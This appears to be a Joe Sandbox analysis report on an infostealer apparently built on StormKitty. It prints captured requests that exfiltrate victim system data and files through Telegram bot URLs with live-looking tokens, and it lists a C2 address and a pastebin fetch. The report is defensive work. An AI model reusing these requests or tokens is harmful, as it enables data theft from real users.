                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.232.249.111 7707Jump to behavior
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: pastebin.com
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 94.232.249.111:7707
                    Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                    Source: global trafficHTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564"Host: api.telegram.orgContent-Length: 152152Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="10e946af-e98d-41dd-8591-bd5457d5eee6"Host: api.telegram.orgContent-Length: 152152Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.44.66 104.21.44.66
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: icanhazip.com
                    Source: unknownDNS query: name: icanhazip.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: 107.143.13.0.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                    Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: unknownHTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564"Host: api.telegram.orgContent-Length: 152152Expect: 100-continue
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.orgd
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                    Source: svchost.exe, 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: svchost.exe, 00000007.00000002.2930957797.0000000005BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/t
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comd
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                    Source: zrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: luglzv.exe.7.drString found in binary or memory: https://api.telegram.org/bot
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=57954
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=57954
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drString found in binary or memory: https://api.telegram.org/file/bot
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgd
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drString found in binary or memory: https://github.com/LimerBoy/StormKitty
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&nq
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKittyTCfq$
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drString found in binary or memory: https://pastebin.com/raw/7B75u64B
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7B75u64Bd
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://support.mozilla.org
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
